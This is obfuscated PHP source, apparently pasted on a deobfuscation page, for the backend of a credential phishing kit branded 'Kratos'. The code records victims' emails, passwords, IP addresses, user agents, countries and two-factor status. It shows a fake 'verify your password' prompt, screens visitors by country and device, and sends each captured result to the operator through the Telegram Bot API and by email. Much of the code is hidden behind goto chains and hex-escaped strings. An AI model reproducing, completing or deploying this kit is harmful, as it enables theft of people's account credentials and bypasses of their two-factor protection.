goto F003c; } goto d9271; cff36: $a5f65 = "page/images/" . $this->b5c62["background"] . ".png"; goto D8197; e983c: $a5f65 = "images/" . $this->b5c62["background"] . ".png"; goto Da1d2; a1852: goto bf030; goto b502e; df62b: Ba603: goto Fe271; b502e: A0a40: goto d1111; Ef10d: if (file_exists($a5f65)) { goto Cfbd2; } goto b3218; bbd70: goto ea79f; goto B9e35; bf937: F003c: goto b6a7b; b6a7b: Cfbd2: goto Adeb4; Dfe94: if ($this->b5c62["background"] == "custom") { goto caff1; } goto e983c; Fe271: return "\xd
        html,\xd\xa        body {
\xa            content: ""; /* Empty content to allow the pseudo-element to render */
            position: absolute; /* Absolute positioning */
            top: 0;
            left: 0;
            right: 0;
\xa            bottom: 0;
            z-index: -1; /* Ensure it stays behind other content */
            background-image: url("" . $D3f03 . "");\xd
            background-size: cover; /* Scale image to cover the entire area */\xd\xa            background-position: center; /* Center the background image */
            background-repeat: no-repeat; /* Prevent repeating the image */\xd\xa        } 
        "; goto c2f08; f15eb: return $D3f03; goto df62b; d77da: D2860: goto E2977; B9e35: caff1: goto f7647; f7647: $a5f65 = "images/" . $this->b5c62["custom_background"]; goto Ef10d; Da1d2: if (file_exists($a5f65)) { goto D67ec; } goto cff36; c2f08: } public function getFirstMessage() { goto A4000; B91d0: goto B04f1; goto df5d9; e25c4: return "Because you're accessing sensitive info, you need to verify your password"; goto dc559; d478f: d057d: goto B91d0; E3d6d: A51c7: goto dde22; F7de1: goto d057d; goto E3d6d; D35d9: return ''; goto cfa66; dde22: return $this->b5c62["custom_firstmessage"]; goto d478f; dc559: B04f1: goto ed016; Dc688: if ($Dd25a == "text") { goto A51c7; } goto A4ceb; ed016: goto fd5c9; goto edf10; a2cee: if ($Dd25a == "default") { goto bffd4; } goto Dc688; c7c28: if ($Dd25a == "none") { goto f70cd; } goto a2cee; A4ceb: if (!($Dd25a == "images")) { goto a4a3e; } goto ecad1; e03c8: a4a3e: goto F7de1; df5d9: bffd4: goto e25c4; ecad1: return "<img src="" . $this->imageToBase64("../" . $this->b5c62["custom_firstmessage"]) . "" alt="Icon" style="width: 50%; height: auto;" class="d-block"/>"; goto e03c8; edf10: f70cd: goto D35d9; cfa66: fd5c9: goto Cc44c; A4000: $Dd25a = $this->b5c62["first_message"]; goto c7c28; Cc44c: } public function readJsonFile($B6346) { goto df718; df718: if (file_exists($B6346)) { goto cbfeb; } goto Dfabf; Fcd05: return is_array($Bbeec) ? $Bbeec : []; goto a0e4a; f57d4: $Bbeec = json_decode($e1200, true); goto Fcd05; b6ccd: return []; goto D338a; Dfabf: file_put_contents($B6346, json_encode([])); goto b6ccd; D338a: cbfeb: goto Adf3d; Adf3d: $e1200 = file_get_contents($B6346); goto f57d4; a0e4a: } public function writeJsonFile($B6346, $Bbeec) { $e1200 = json_encode($Bbeec, JSON_PRETTY_PRINT); file_put_contents($B6346, $e1200); } public function getFirstDataByIp($Bbeec, $bbd77) { goto B6b33; Ca1ed: e441c: goto D7c6e; D7c6e: return null; goto d3f4f; B6b33: foreach ($Bbeec as $b8a12) { goto C093a; a7f54: return $b8a12; goto E3ece; E3ece: F386c: goto a551a; a551a: Fd3c4: goto d9604; C093a: if (!(isset($b8a12["ip"]) && $b8a12["ip"] === $bbd77)) { goto F386c; } goto a7f54; d9604: } goto Ca1ed; d3f4f: } public function generatePrimaryId($Bbeec) { goto De93d; De93d: $b2dee = 0; goto D8e94; B216d: dd5a7: goto Fb270; D8e94: foreach ($Bbeec as $b8a12) { goto c8a2b; e0f9a: ef584: goto Af64a; c8a2b: if (!(isset($b8a12["id"]) && $b8a12["id"] > $b2dee)) { goto a1d2b; } goto Bc330; Bc330: $b2dee = $b8a12["id"]; goto Ebaad; Ebaad: a1d2b: goto e0f9a; Af64a: } goto B216d; Fb270: return $b2dee + 1; goto db4b3; db4b3: } public function isDataExist($Bbeec, $bbd77) { goto Ee015; Ee015: foreach ($Bbeec as $b8a12) { goto C7edb; c9255: return true; goto Ff86a; C7edb: if (!(isset($b8a12["ip"]) && $b8a12["ip"] === $bbd77)) { goto b400f; } goto c9255; Bbc6c: e37e5: goto eae86; Ff86a: b400f: goto Bbc6c; eae86: } goto E8339; eef10: return false; goto Efca2; E8339: d029b: goto eef10; Efca2: } public function makeStealthRequest($df8c4) { goto ae9c5; Cda82: $c669b = curl_init(); goto C935e; C935e: curl_setopt($c669b, CURLOPT_URL, $df8c4); goto c142a; e26ca: return $Fc5f1; goto add89; ab9c8: f7236: goto Dbc64; b6fb4: curl_setopt($c669b, CURLOPT_SSL_VERIFYHOST, 0); goto bc245; bc245: curl_setopt($c669b, CURLOPT_FOLLOWLOCATION, true); goto d95ae; d95ae: $Fc5f1 = curl_exec($c669b); goto Ef8c8; b5e3c: curl_setopt($c669b, CURLOPT_SSL_VERIFYPEER, 0); goto b6fb4; e00e6: echo "cURL Error: " . curl_error($c669b); goto ab9c8; c142a: curl_setopt($c669b, CURLOPT_HTTPHEADER, ["User-Agent: {$f9711}", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Encoding: gzip, deflate, br", "Accept-Language: en-US,en;q=0.9", "Connection: keep-alive", "Referer: https://www.google.com/"]); goto D76a0; D76a0: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, 1); goto b5e3c; Dbc64: curl_close($c669b); goto e26ca; Ef8c8: if (!curl_errno($c669b)) { goto f7236; } goto e00e6; d31bc: $f9711 = $dcf03[array_rand($dcf03)]; goto Cda82; ae9c5: $dcf03 = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/89.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.864.59", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/74.0"]; goto d31bc; add89: } public function onlyOneTimeUse() { goto B6b5e; a46c9: cc3b3: goto C6c26; F8508: if (!($bbd77 == "::1")) { goto cc3b3; } goto E36f6; B6b5e: $F35e2 = dirname(__FILE__); goto F842f; ee39e: return $De0aa; goto ac46a; F842f: $B6346 = $F35e2 . "/../" . $this->b5c62["files"]["valid"]; goto af81f; C67fe: B7150: goto ee39e; E36f6: $bbd77 = "132.242.213.202"; goto a46c9; C6c26: foreach ($Bbeec as $E5923) { goto Ad2b3; c3458: if ($E5923["details"]["twofactor"]) { goto b0c4a; } goto c5237; Ad2b3: if (!($E5923["ip"] == $bbd77)) { goto E1a2a; } goto d0724; d89e3: b0c4a: goto eb034; aa131: cd0f1: goto A6904; d0724: if ($E5923["details"]["twofactor"] && $E5923["details"]["twofactor_status"] == "Complete") { goto cd0f1; } goto c3458; E153b: E1a2a: goto F904c; c5237: $De0aa = true; goto d89e3; eb034: goto d1d6f; goto aa131; F904c: Afa56: goto Fd6a1; A6904: $De0aa = true; goto F9180; F9180: d1d6f: goto E153b; Fd6a1: } goto C67fe; af81f: $Bbeec = $this->readJsonFile($B6346); goto E2b5a; fab3f: $bbd77 = $this->getClientIp(); goto F8508; E2b5a: $De0aa = false; goto fab3f; ac46a: } public function editData($b5c0b, $Dc230) { goto B92c2; b33d1: $Bbeec = $this->readJsonFile($B6346); goto b530f; c6eb2: $Bbeec[$F15fe]["details"]["twofactor_status"] = $Dc230; goto Dc2f6; ac3be: $B6346 = $F35e2 . "/../" . $this->b5c62["files"]["valid"]; goto b33d1; B92c2: $F35e2 = dirname(__FILE__); goto ac3be; b530f: $F4ca0 = 0; goto Acaaf; D5cae: d36df: goto c6eb2; Dc2f6: $this->writeJsonFile($B6346, $Bbeec); goto Ed732; Acaaf: foreach ($Bbeec as $E5923) { goto C46aa; C4a56: $F15fe = $F4ca0; goto Dc243; Dc243: de790: goto E66de; C46aa: if (!($E5923["details"]["email"] == $b5c0b)) { goto de790; } goto C4a56; fa824: af258: goto c6607; E66de: $F4ca0++; goto fa824; c6607: } goto D5cae; Ed732: } public function insertAdditional($Fb379, $b5c0b, $ee7df, $C9257 = true) { goto Bebad; e15d3: if ($C9257) { goto b1467; } goto e7e78; d7840: $_SESSION["user_data"] = $d03cc; goto A4aec; D46a0: $d03cc["details"]["edu"] = $Fb379["edu"]; goto a070d; aa7b3: $d03cc["details"]["twofactor"] = $Fb379["twofactor"]; goto ce1aa; f5666: if ($d03cc["details"]["twofactor"]) { goto C7e69; } goto c5fae; c5fae: $d03cc["details"]["twofactor_status"] = "No"; goto bc061; e7e78: $B6346 = $F35e2 . "/../" . $this->b5c62["files"]["invalid"]; goto d32aa; aa810: if (!$Fb379["live"]) { goto e47c3; } goto aa7b3; be115: $Bbeec = $this->readJsonFile($B6346); goto c1c7a; a070d: $d03cc["details"]["type"] = $Fb379["type"]; goto f5666; acef5: $this->writeJsonFile($B6346, $Bbeec); goto d7840; a8867: $Bbeec[] = $d03cc; goto acef5; d5ef6: $d03cc["details"]["email"] = $b5c0b; goto Ff194; Ad9d1: ba052: goto E3b02; E3b02: e47c3: goto A6e09; bc061: goto ba052; goto F7177; A2b32: c48ca: goto be115; F259a: $B6346 = $F35e2 . "/../" . $this->b5c62["files"]["valid"]; goto A2b32; b133e: $d03cc["details"]["twofactor_status"] = "Waiting"; goto Ad9d1; ce1aa: $d03cc["details"]["role"] = $Fb379["role"]; goto D46a0; B6948: $d03cc["details"]["status"] = $Fb379["live"]; goto d5ef6; c1c7a: $d03cc = $_SESSION["user_data"]; goto B6948; A6e09: $d03cc["id"] = $this->generatePrimaryId($Bbeec); goto a8867; b2eda: b1467: goto F259a; Ff194: $d03cc["details"]["password"] = $ee7df; goto aa810; F7177: C7e69: goto b133e; d32aa: goto c48ca; goto b2eda; Bebad: $F35e2 = dirname(__FILE__); goto e15d3; A4aec: } public function insertDataVisitor($A0b3d = true) { goto fed4c; Ebca7: $bbd77 = $this->getClientIp(); goto ac428; Ee583: $this->writeJsonFile($B6346, $Bbeec); goto E33c7; c63c4: $Bbeec[] = $d03cc; goto Ee583; E33c7: $_SESSION["user_data"] = $d03cc; goto E280b; Eb336: Ea9ca: goto ba5e2; C61a0: F9e48: goto e45f0; Eeb18: if (!$this->isDataExist($Bbeec, $bbd77)) { goto Baa52; } goto Afb10; Edcbd: $B6346 = $F35e2 . "/../" . $this->b5c62["files"]["visit"]; goto c0598; B5fde: $this->checkUserSecurity($Bbeec); goto f8a65; Faf62: Baa52: goto Adca1; f8a65: return 1; goto Faf62; ac428: if (!($bbd77 == "::1")) { goto cd915; } goto b55b3; b55b3: $bbd77 = "132.242.213.202"; goto C1124; ba5e2: $d03cc = $this->insertUserInformation($bbd77); goto C61a0; E280b: $this->checkUserSecurity($d03cc); goto ceb7f; c0598: $Bbeec = $this->readJsonFile($B6346); goto Ebca7; e45f0: $d03cc["id"] = $this->generatePrimaryId($Bbeec); goto c63c4; Adca1: if ($A0b3d) { goto Ea9ca; } goto cca7f; E1b76: $_SESSION["user_data"] = $Bbeec; goto B5fde; C1124: cd915: goto Eeb18; fed4c: $F35e2 = dirname(__FILE__); goto Edcbd; Afb10: $Bbeec = $this->getFirstDataByIp($Bbeec, $bbd77); goto E1b76; Ebdab: goto F9e48; goto Eb336; cca7f: $d03cc = $this->insertUserInformation($bbd77, false); goto Ebdab; ceb7f: } private function SendMessageTelegram($c766f, $df61c, $f6aeb) { goto b33b8; f3080: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, true); goto f6cb7; e01c6: $D2156 = curl_exec($c669b); goto F080f; bae5f: Dda5c: goto b2746; f6cb7: curl_setopt($c669b, CURLOPT_POST, true); goto a3ca2; F080f: if (!curl_errno($c669b)) { goto Dda5c; } goto Dd036; e0761: $c669b = curl_init($df8c4); goto f3080; Ef099: return json_decode($D2156, true); goto d5db8; c47c9: curl_setopt($c669b, CURLOPT_HTTPHEADER, ["Content-type: application/x-www-form-urlencoded"]); goto e01c6; Dd036: echo "Error:" . curl_error($c669b); goto bae5f; b2746: curl_close($c669b); goto Ef099; b33b8: $df8c4 = "https://api.telegram.org/bot{$c766f}/sendMessage"; goto ccd04; a3ca2: curl_setopt($c669b, CURLOPT_POSTFIELDS, http_build_query($Bbeec)); goto c47c9; ccd04: $Bbeec = ["chat_id" => $df61c, "text" => $f6aeb, "parse_mode" => "HTML"]; goto e0761; d5db8: } private function SendFileTelegram($c766f, $df61c, $e0d45) { goto C10a5; Ef043: curl_setopt($c669b, CURLOPT_POSTFIELDS, $D03a2); goto Aa450; Aa450: $D2156 = curl_exec($c669b); goto E4ce6; D9a05: return $D2156; goto dd9cc; afef2: curl_setopt($c669b, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]); goto fbee4; C10a5: $df8c4 = "https://api.telegram.org/bot{$c766f}/sendDocument"; goto c0900; E4ce6: curl_close($c669b); goto D9a05; fbee4: curl_setopt($c669b, CURLOPT_URL, $df8c4); goto B4845; a2701: $c669b = curl_init(); goto afef2; c0900: $D03a2 = ["chat_id" => $df61c, "document" => new CURLFile(realpath($e0d45))]; goto a2701; B4845: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, 1); goto Ef043; dd9cc: } public function SendInfoTelegram($Fb379, $b5c0b, $ee7df) { goto Aaec4; Aa768: $Bf82f = "<b>Kratos</b> Valid Result<br><br>\xd\xa                Email : {$b5c0b}<br>\xd\xa                Password : {$ee7df}<br>
\xa                IP: {$bbd77}<br>
                User Agent: {$d27df}<br>\xd\xa                Country: {$Bf74f}<br>
\xa                2FA: {$Daad5}<br>\xd
                Role: {$bdb2d}<br>\xd\xa                Edu: {$Cfa85}"; goto Ff73d; afb5b: C430a: goto fb0a9; e7880: $this->SendFileTelegram($c766f, $df61c, $e0d45); goto bee48; A5755: $d27df = $_SESSION["user_data"]["ua"]; goto D886f; Eb6f7: if (!(!$Fb379["live"] && $this->b5c62["sendtype"] == 1)) { goto cbf5d; } goto Be951; E6f0f: $Af7c5 .= "Return-Path: {$Dfffe}" . "\xd
"; goto b7fec; c4669: goto a2937; goto b38b6; a04c1: df349: goto aa285; F5cac: $bbd77 = $_SESSION["user_data"]["ip"]; goto a6232; bd116: $bdb2d = $Fb379["role"] == true ? "Yes" : "No"; goto Da724; A6f80: return 0; goto A811d; Dd000: return 0; goto c4669; b7fec: $Af7c5 .= "X-Mailer: PHP/" . phpversion() . "
"; goto Ec802; Ee995: $df61c = $this->b5c62["telegram"]["chat_id"]; goto Ba640; D47db: $A7d9f = $_SERVER["SERVER_NAME"]; goto Ddc60; cfbc1: $f6aeb = "<b>Kratos</b> Valid Result\xa\xaEmail : <code>{$b5c0b}</code>\xaPassword : <code>{$ee7df}</code>\xaIP: {$bbd77}
User Agent: <code>{$d27df}</code>\xaCountry: {$Bf74f}
2FA: {$Daad5}\xaRole: {$bdb2d}
Edu: {$Cfa85}"; goto f4beb; a6232: $d27df = $_SESSION["user_data"]["ua"]; goto Bc1a1; F64f6: $bbd77 = $_SESSION["user_data"]["ip"]; goto A5755; fb0a9: cc340: goto b7539; E946d: $Cfa85 = $Fb379["edu"] == true ? "Yes" : "No"; goto bfb2a; Ec802: if ($Fb379["live"]) { goto df349; } goto Eb6f7; cc94c: if (!(!$Fb379["live"] && $this->b5c62["sendtype"] == 1)) { goto adf1f; } goto F9a7c; Aaec4: $F35e2 = dirname(__FILE__); goto C8779; aa285: $Bf74f = $_SESSION["user_data"]["info"]["country"]; goto d000b; a5408: a2937: goto D5160; f4937: $d27df = $_SESSION["user_data"]["ua"]; goto ae476; bea28: $Af7c5 .= "Content-type:text/html;charset=UTF-8" . "\xd\xa"; goto Afe5f; bee48: Bb7d9: goto a5579; Cb245: $Dfffe = "noreply@" . $A7d9f; goto D1a13; F9a7c: $Bf74f = $_SESSION["user_data"]["info"]["country"]; goto F64f6; E9ae7: $bbd77 = $_SESSION["user_data"]["ip"]; goto f4937; b5c27: adf1f: goto Aaeea; Ff73d: if (@mail($D4324, $Bf8ad, $Bf82f, $Af7c5)) { goto F2aa4; } goto A6f80; bfb2a: $bdb2d = $Fb379["role"] == true ? "Yes" : "No"; goto accd5; accd5: $Daad5 = $Fb379["twofactor"] == true ? "Yes" : "No"; goto E052a; Ed192: if (!$this->b5c62["email"]["active"]) { goto cc340; } goto D47db; Bc1a1: $Bf8ad = "Student Detains [Invalid]"; goto dfa2a; a7715: if (!file_exists($e0d45)) { goto Bb7d9; } goto e7880; Aaeea: goto be826; goto bb54f; Afe5f: $Af7c5 .= "From: {$Ddcf3} <{$Dfffe}>" . "
"; goto bdc59; Ac281: if (!$this->b5c62["telegram"]["active"]) { goto d50c0; } goto daf10; bfc8d: d50c0: goto Ed192; F6ee5: if (@mail($D4324, $Bf8ad, $Bf82f, $Af7c5)) { goto Accad; } goto Dd000; ae476: $Cfa85 = $Fb379["edu"] == true ? "Yes" : "No"; goto bd116; Da724: $Daad5 = $Fb379["twofactor"] == true ? "Yes" : "No"; goto cfbc1; D5160: cbf5d: goto D24f8; D24f8: goto C430a; goto a04c1; d000b: $bbd77 = $_SESSION["user_data"]["ip"]; goto C0907; bdc59: $Af7c5 .= "Reply-To: {$Dfffe}" . "\xd\xa"; goto E6f0f; a5579: be826: goto bfc8d; bb54f: F5847: goto ba8ab; ba8ab: $Bf74f = $_SESSION["user_data"]["info"]["country"]; goto E9ae7; f4beb: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto a7715; Cc97b: return 1; goto a5408; C0907: $d27df = $_SESSION["user_data"]["ua"]; goto E946d; Be951: $Bf74f = $_SESSION["user_data"]["info"]["country"]; goto F5cac; Ddc60: $D4324 = $this->b5c62["email"]["email"]; goto Cb245; dfa2a: $Bf82f = "<b>Kratos</b> <s>Invalid</s> Result<br><br>
                Email : {$b5c0b}<br>\xd
                Password : {$ee7df}<br>\xd
                IP: {$bbd77}<br>\xd\xa                User Agent: <code>{$d27df}<br>
                Country: {$Bf74f}"; goto F6ee5; D1a13: $Ddcf3 = "Student Detains"; goto Bc891; F9647: Dc2a5: goto afb5b; E052a: $Bf8ad = "Student Detains [Valid]"; goto Aa768; D886f: $f6aeb = "<b>Kratos</b> <s>Invalid</s> Result
\xaEmail : <code>{$b5c0b}</code>
Password : <code>{$ee7df}</code>\xaIP: {$bbd77}\xaUser Agent: <code>{$d27df}</code>
Country: {$Bf74f}"; goto Deda1; daf10: $c766f = $this->b5c62["telegram"]["bot_token"]; goto Ee995; b38b6: Accad: goto Cc97b; F94fd: return 1; goto F9647; A811d: goto Dc2a5; goto de532; C8779: $e0d45 = $F35e2 . "/../page/core/js_" . $b5c0b . ".txt"; goto Ac281; Bc891: $Af7c5 = "MIME-Version: 1.0" . "\xd\xa"; goto bea28; de532: F2aa4: goto F94fd; Deda1: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto b5c27; Ba640: if ($Fb379["live"]) { goto F5847; } goto cc94c; b7539: } public function SendFileOnlyTelegram($Fb379, $b5c0b, $B82fd) { goto Fbfd1; F0c75: $this->SendFileTelegram($c766f, $df61c, $e0d45); goto b0675; b6037: bf799: goto d1bba; f2e92: $f6aeb = "<b>Kratos</b> 2FA is Failed

Email : <code>{$b5c0b}</code>
Method : <code>{$B82fd}</code>
Status : <code>Invalid</code>
Reason : <code>{$Fab8b}</code>"; goto Bde07; A6b0f: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto bf6b4; C56b6: $f6aeb = "<b>Kratos</b> 2FA is Completed
\xaEmail : <code>{$b5c0b}</code>
Method : <code>{$B82fd}</code>
Status : <code>Valid</code>"; goto A6b0f; Eb59f: $e0d45 = $F35e2 . "/../page/core/js_" . $b5c0b . ".txt"; goto Acea2; d1bba: B67c0: goto Fa367; Acea2: if (!$this->b5c62["telegram"]["active"]) { goto B67c0; } goto D22c6; Fbfd1: $F35e2 = dirname(__FILE__); goto Eb59f; Bde07: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto e792f; c7792: $Fab8b = $Fb379["reason"]; goto f2e92; D22c6: $c766f = $this->b5c62["telegram"]["bot_token"]; goto A5600; A5600: $df61c = $this->b5c62["telegram"]["chat_id"]; goto d84b0; A3e52: goto bf799; goto f0917; d84b0: if ($Fb379["live"]) { goto f7ce9; } goto cdd2a; f0917: f7ce9: goto C56b6; b0675: c27b2: goto b6037; e792f: E27ea: goto A3e52; cdd2a: if (!(!$Fb379["live"] && $this->b5c62["sendtype"] == 1)) { goto E27ea; } goto c7792; bf6b4: if (!file_exists($e0d45)) { goto c27b2; } goto F0c75; Fa367: } public function checkCountryCode() { goto A7888; F9b5d: return; goto b5711; A7888: if (isset($_SESSION["user_data"]["info"]["country_code"])) { goto cc72f; } goto F9b5d; Ac985: if (!in_array($_SESSION["user_data"]["info"]["country_code"], $this->b5c62["unchecked_countries"])) { goto ba526; } goto fd76e; Aca27: ba526: goto e9dea; b5711: cc72f: goto Ac985; fd76e: $this->redirect("Country"); goto Aca27; e9dea: } public function checkDevice() { goto A5101; F17f9: $this->redirect("Device"); goto F19cb; A5101: $e16f0 = $this->getDeviceType($this->getUserAgent()); goto A4926; F19cb: fb294: goto dd095; A4926: if (!in_array($e16f0, $this->b5c62["unchecked_devices"])) { goto fb294; } goto F17f9; dd095: } function getDeviceType($b07ad) { goto D7e46; a5263: A25b6: goto C7688; ad18d: C7041: goto b99fd; bb6b8: return "tablet"; goto a5263; ab816: return "mobile"; goto ad18d; b99fd: return "desktop"; goto bf536; D7e46: if (!preg_match("/ipad|tablet|kindle|nook|android(?!.*mobile)/", $b07ad)) { goto A25b6; } goto bb6b8; C7688: if (!preg_match("/mobile|android|iphone|ipod|blackberry|iemobile|opera mini|windows phone/", $b07ad)) { goto C7041; } goto ab816; bf536: } public function checkLockEmail($b5c0b) { goto f7172; F0baf: die("Email List Not found"); goto E57a5; F8998: return false; goto D6359; C8f58: $B1435 = "text to search"; goto C9ae3; F9da8: Acc48: goto d213e; C0206: if (strpos($fa845, $b5c0b) !== false) { goto Acc48; } goto F8998; f1b7e: D2a34: goto ee887; A6de5: $fa845 = file_get_contents($e0d45); goto C0206; c5635: e80c5: goto f1b7e; d213e: return true; goto c5635; f7172: $e0d45 = "../" . $this->b5c62["lock_email"]["list"]; goto C8f58; C9ae3: if (file_exists($e0d45)) { goto F613f; } goto F0baf; D6359: goto e80c5; goto F9da8; D13c1: F613f: goto A6de5; E57a5: goto D2a34; goto D13c1; ee887: } } 
 ?>

Did this file decode correctly?

Original Code

<?php
/*   Important Notice
        Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences.
        
        Please respect the rights associated with this work.
        */
 goto cec45; b841d: session_start(); goto d27ca; d27ca: cd7ad: goto E233c; c031c: if (!(session_status() == PHP_SESSION_NONE)) { goto cd7ad; } goto b841d; A5694: ini_set("\x64\151\x73\160\154\x61\x79\137\x65\162\162\157\x72\163", 0); goto c031c; cec45: error_reporting(0); goto A5694; E233c: class Config { private $b5c62; public function __construct(array $config) { $this->b5c62 = $config; } public function check_captcha() { goto b14bb; D2707: a96e2: goto A01b9; b6e1d: return true; goto eb893; A01b9: return false; goto D2963; D2963: d85cd: goto Aaf2a; b14bb: if (!$this->b5c62["\x63\x61\160\x74\x63\x68\141"]["\x61\143\164\x69\166\145"]) { goto a96e2; } goto b6e1d; eb893: goto d85cd; goto D2707; Aaf2a: } public function getMimeType($B6346) { goto A5b0a; Ae705: B3a9f: goto d35fb; A5b0a: if (function_exists("\146\x69\156\x66\x6f\x5f\x66\151\x6c\x65")) { goto B1821; } goto abcf0; af9da: finfo_close($Cf29a); goto e5f6f; e5f6f: goto B3a9f; goto Ccb58; E5b47: $B8f87 = "\141\160\x70\154\151\143\x61\x74\151\157\x6e\57\157\143\164\145\164\55\x73\x74\162\145\141\x6d"; goto eb06e; E10c3: B1821: goto bb7c4; abcf0: if (function_exists("\155\151\x6d\x65\137\143\157\156\164\145\x6e\164\137\x74\171\x70\x65")) { goto cd5c4; } goto E5b47; eb06e: goto B3a9f; goto E10c3; Ccb58: cd5c4: goto b4fd9; bb7c4: $Cf29a = finfo_open(FILEINFO_MIME_TYPE); goto cb59c; d35fb: return $B8f87; goto B5e7a; b4fd9: $B8f87 = mime_content_type($B6346); goto Ae705; cb59c: $B8f87 = finfo_file($Cf29a, $B6346); goto af9da; B5e7a: } public function check_cloudflare() { goto a97bf; a97bf: if (!$this->b5c62["\x63\154\x6f\x75\x64\x66\154\x61\162\x65"]["\x61\143\x74\151\166\x65"]) { goto A44d1; } goto d66e7; e4640: Da555: goto a2645; d50bf: A44d1: goto E720e; E720e: return false; goto e4640; cff07: goto Da555; goto d50bf; d66e7: return true; goto cff07; a2645: } public function check_captcha_status() { goto Acdd7; ded76: goto b7791; goto e920f; e920f: c5b70: goto D947b; Acdd7: if ($this->check_captcha() && !isset($_SESSION["\143\x61\160\164\143\x68\x61"])) { goto c5b70; } goto E1edf; d2f8a: b7791: goto F4023; E1edf: return false; goto ded76; D947b: return true; goto d2f8a; F4023: } public function check_cloudflare_status() { goto eff9e; Ec7de: return false; goto ecc7a; F7118: d9880: goto C3dce; ecc7a: goto Ae855; goto F7118; eff9e: if ($this->check_cloudflare() && !isset($_SESSION["\143\154\x6f\165\144\x66\x6c\x61\162\x65"])) { goto d9880; } goto Ec7de; D8eb2: Ae855: goto Bd2be; C3dce: return true; goto D8eb2; Bd2be: } public function getRandomVoiceTitle() { goto afba7; eda69: $d921a = rand(0, 7); goto a30dd; a30dd: return $c6b25[$d921a]; goto E9f4c; afba7: $c6b25 = ["\x26\x23\70\66\x3b\x26\x23\61\x31\x31\73\x26\x23\61\60\65\x3b\x26\x23\x39\71\x3b\46\43\61\60\61\73\x26\43\63\x32\73\46\x23\x37\67\73\46\x23\71\x37\73\x26\x23\x31\60\x35\x3b\46\43\x31\x30\x38\73\x26\43\63\62\x3b\x26\43\x37\70\x3b\46\43\x31\61\61\73\46\x23\x31\x31\x36\x3b\46\43\61\x30\65\x3b\x26\x23\61\60\x32\73\x26\x23\x31\x30\65\x3b\46\x23\71\x39\73\46\x23\x39\67\73\46\43\61\61\66\x3b\46\43\x31\x30\65\x3b\x26\x23\61\61\x31\x3b\x26\43\61\61\60\73", "\46\43\x38\66\x3b\46\x23\61\61\61\73\x26\x23\61\x30\65\x3b\46\43\x39\71\x3b\x26\43\x31\60\61\x3b\x26\43\63\62\x3b\x26\43\x37\x38\73\x26\x23\x31\x31\x31\x3b\x26\x23\61\x31\x36\x3b\46\43\61\60\61\73\46\x23\x33\x32\x3b\x26\x23\x37\70\x3b\46\x23\61\x31\61\73\x26\x23\61\x31\x36\x3b\46\x23\x31\x30\65\x3b\46\x23\61\x30\62\x3b\x26\43\x31\x30\65\x3b\x26\43\71\71\73\x26\x23\71\x37\73\x26\43\61\61\x36\x3b\46\x23\x31\x30\x35\x3b\46\x23\61\61\x31\73\46\43\61\x31\x30\73", "\x26\43\x38\x36\x3b\46\x23\x31\61\x31\73\x26\x23\61\x30\x35\x3b\x26\43\x39\71\x3b\x26\x23\61\x30\61\x3b\46\43\63\62\x3b\46\x23\x37\x37\x3b\x26\x23\61\x30\x31\x3b\46\x23\61\x31\65\73\x26\x23\61\61\65\x3b\46\43\x39\x37\73\x26\x23\x31\x30\x33\73\x26\43\61\x30\x31\73", "\46\x23\x37\x30\73\x26\x23\61\60\x31\x3b\46\43\x31\60\x31\73\46\43\61\x30\x38\x3b\46\43\x33\62\73\46\43\x38\x36\x3b\x26\43\61\61\61\x3b\x26\43\x31\60\x35\73\x26\43\x39\x39\73\x26\x23\x31\60\x31\x3b\46\43\63\62\x3b\x26\x23\x37\x38\x3b\46\x23\x31\61\x31\x3b\x26\43\61\61\x36\73\46\43\61\60\x31\x3b", "\46\43\x38\66\73\x26\43\61\x31\x31\73\x26\43\61\60\65\73\46\43\x39\71\x3b\x26\x23\x31\x30\x31\73\46\x23\63\62\73\46\x23\67\70\x3b\x26\x23\x31\61\61\73\x26\43\x31\x31\66\x3b\x26\x23\x31\x30\61\73\46\x23\63\62\73\46\x23\66\70\x3b\46\43\x31\x31\64\x3b\46\43\61\x31\x31\x3b\46\x23\x31\x31\62\73\x26\x23\x33\62\73\x26\43\67\x30\x3b\46\43\61\60\61\x3b\x26\43\x31\60\x31\73\x26\43\x31\60\x38\73", "\x26\43\x38\66\x3b\46\x23\61\61\61\x3b\x26\43\61\x30\65\x3b\x26\43\x39\71\73\46\43\x31\60\61\x3b\x26\x23\63\62\x3b\x26\x23\x37\x38\73\x26\x23\x31\x31\x31\73\x26\43\61\61\x36\73\x26\x23\x31\x30\61\x3b\x26\43\63\x32\73\x26\43\x38\x33\73\46\x23\x39\67\73\x26\x23\61\x31\x38\73\46\x23\x31\x30\x31\73\x26\43\63\x32\x3b\46\x23\70\x33\x3b\46\x23\x31\x30\x31\x3b\x26\x23\x31\61\x36\x3b\46\43\63\62\73\46\43\x37\x30\x3b\x26\x23\61\x30\61\x3b\x26\x23\x31\60\x31\x3b\x26\x23\x31\60\70\x3b", 